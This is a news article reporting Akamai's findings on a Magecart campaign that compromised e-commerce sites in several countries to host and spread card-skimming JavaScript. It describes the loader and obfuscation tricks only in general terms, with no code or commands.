A cybercriminal group under the Magecart umbrella has deployed a sophisticated attack on e-commerce sites in multiple countries, using them to host skimming malware that can steal credit card data and personally identifiable information (PII). In addition, the group has also been using the same infected sites to deliver malware to other target sites, which amplifies the danger of the campaign. The group behind the attack, which researchers from Akamai recently spotted, has already affected an unknown number of people across the US, UK, Brazil, Spain, Estonia, Australia, and Peru.
Magecart is a collective of cybercriminal organizations notorious for compromising thousands of websites around the world, including major businesses such as TicketMaster and British Airways. These groups inject malware into legitimate e-commerce sites, through either exploiting vulnerabilities or taking over third-party components, that then intercepts data submitted through the website. Once the data is intercepted, it is then sent to a remote server for monetization. Last year, Akamai recorded Magecart attacks on 9,200 e-commerce sites, with 2,468 still infected by the end of 2020.
However, the latest campaign is distinct from other attacks by Magecart, as the group is not only injecting malware into target sites but also hijacking them to deliver malicious code. By using legitimate domains, the attackers gain the inherent trust built by the domains over time, increasing the chance of their activities going undetected. This campaign is also unusual in that the attackers are targeting a range of software, including Magento, WooCommerce, Shopify, and WordPress.
The attack’s infrastructure is highly sophisticated, featuring several tricks that disguise the malicious activity. Instead of injecting a skimmer directly into a target website, the attacker inserts small JavaScript code snips into its web pages that later fetch the malicious skimmer from a host website. The JavaScript that the attacker uses is similar to that of Google Tag Manager and other legitimate third-party services. The attacker also incorporates Base64 encoding into the URLs of infected websites to obfuscate their actions further.
Despite the sophistication of the campaign, Akamai’s analysis found code in the skimmer malware that ensured the attackers did not steal the same credit card and personal information twice.
The attack has far-reaching implications for e-commerce sites, with tens of thousands of people potentially at risk of falling victim to this attack. Considering that Magecart has a track record of stealing millions of credit cards globally, it is crucial that all e-commerce sites, regardless of the software they use, strictly monitor their websites for malicious activity.
Magecart has become a significant problem for retailers worldwide, as the group consistently adapts and evolves its tactics. The latest campaign’s complexity and scale demonstrate the group’s continued willingness to develop and execute highly sophisticated attacks. As the cybercrime landscape evolves, it is now more critical than ever for businesses to implement robust security measures that can not just defend against existing attacks but anticipate and counter emerging threats.